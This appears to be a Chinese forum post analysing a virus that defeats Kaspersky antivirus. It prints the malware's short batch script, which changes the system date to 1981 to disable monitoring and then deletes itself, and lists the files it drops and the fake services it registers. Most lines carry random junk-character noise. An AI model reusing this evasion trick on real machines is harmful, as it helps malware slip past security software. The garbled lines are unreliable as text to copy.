|
|
|
今天拿到个小病毒..玩了一下下...按某论坛某人的帖得到结果如下
6 B' o' e6 l4 W1 R- Q' C, m
8 P* w+ S; I# v# {0 Z2如果没有安装卡巴斯基,直接运行病毒代码* [9 O9 c+ t0 Z1 i8 J' u
3如果发现安装卡巴斯基,则先释放一个批处理(.bat)文件,注意卡巴的主动防御并没有吹嘘的那么好,对此代码完全是放纵不管!!代码很简单,如下:
! q/ j+ }$ f W( z @echo off
% U) C# e* {! j set date=%date%% y# d- K) ?% ^& ]: n8 ?) H% a R
date 1981-1-12
2 e7 D! w6 W: r- ^ ping -n 45 localhost > nul
/ f. i8 X. z% U2 t date %date%
6 b: f- Z0 J" ?' n: y+ x del %0
* o1 y; K* [ C% a4 _* H9 `: a
0 p# N0 C3 M3 n- m0 \ 会发现系统时间被调整到了1981年1月12日(时间没变,日期变了),这时,卡巴斯基的监控立刻失效,在成功完成Over掉卡巴斯基后,病毒释放如下文件
3 o! P8 I9 T( D% L %SystemRoot%\system32\*.EXE
2 h1 {0 o+ Q6 [: ]2 k %SystemRoot%\system32\*T.EXE, L0 W! G$ ] R7 z2 E
%SystemRoot%\system32\*.DLL
; m/ i! P1 M- t/ b9 \/ K$ v %SystemRoot%\system32\delme.bat
: z% k1 C8 Q9 S4 @$ x. @( j. X (注:*为随机8位字母). Q6 {- t" r3 P& V( J) U/ o0 w
并在注册表HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\添加若干伪系统服务,至此,病毒成功运行!可以说,卡巴斯基被秒杀,一点反抗能力也没有。
' z9 R4 v# f! V5 T& ~- j 其实,这个Bug早已存在,但卡巴斯基一直没有修正,直至现在出现了利用这个Bug的病毒
0 I, ~* T, |4 D/ j) G
1 i, V3 C4 e1 w |
|